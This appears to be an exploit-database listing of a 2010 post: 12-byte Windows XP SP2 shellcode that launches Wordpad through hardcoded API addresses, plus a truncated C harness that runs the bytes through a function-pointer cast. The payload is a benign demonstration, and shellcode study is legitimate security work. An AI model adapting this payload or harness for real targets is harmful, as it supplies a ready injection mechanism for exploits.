Lucene search
K

win32/xp Pro Sp2 English "Wordpad" Shellcode

🗓️ 03 Jan 2010 00:00:00Reported by AodrulezType 
zdt
 zdt
🔗 0day.today👁 17 Views

win32/xp Pro Sp2 English "Wordpad" Shellcode Size: 12 Bytes, Null Free, Author: Aodrule

Code
============================================
win32/xp Pro Sp2 English "Wordpad" Shellcode
============================================

+-------------------------------------------------+
| Windows XP Pro Sp2 English "Wordpad" Shellcode. |
+-------------------------------------------------+
 
Size         : 12 Bytes,Null Free.
Author       : Aodrulez.
 
Shellcode =   "\x68\x87\x4c\x80\x7c\xb8"
              "\x6d\x13\x86\x7c\xff\xd0"
 
+-----------------+
| Shellcodetest.c |
+-----------------+
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
char code[] = "\x68\x87\x4c\x80\x7c\xb8"
              "\x6d\x13\x86\x7c\xff\xd0";
 
 
int main(int argc, char **argv)
{
   
  int (*func)();
  func = (int (*)()) code;
  (int)(*func)();



#  0day.today [2018-04-06]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

03 Jan 2010 00:00Current
7High risk
Vulners AI Score7
17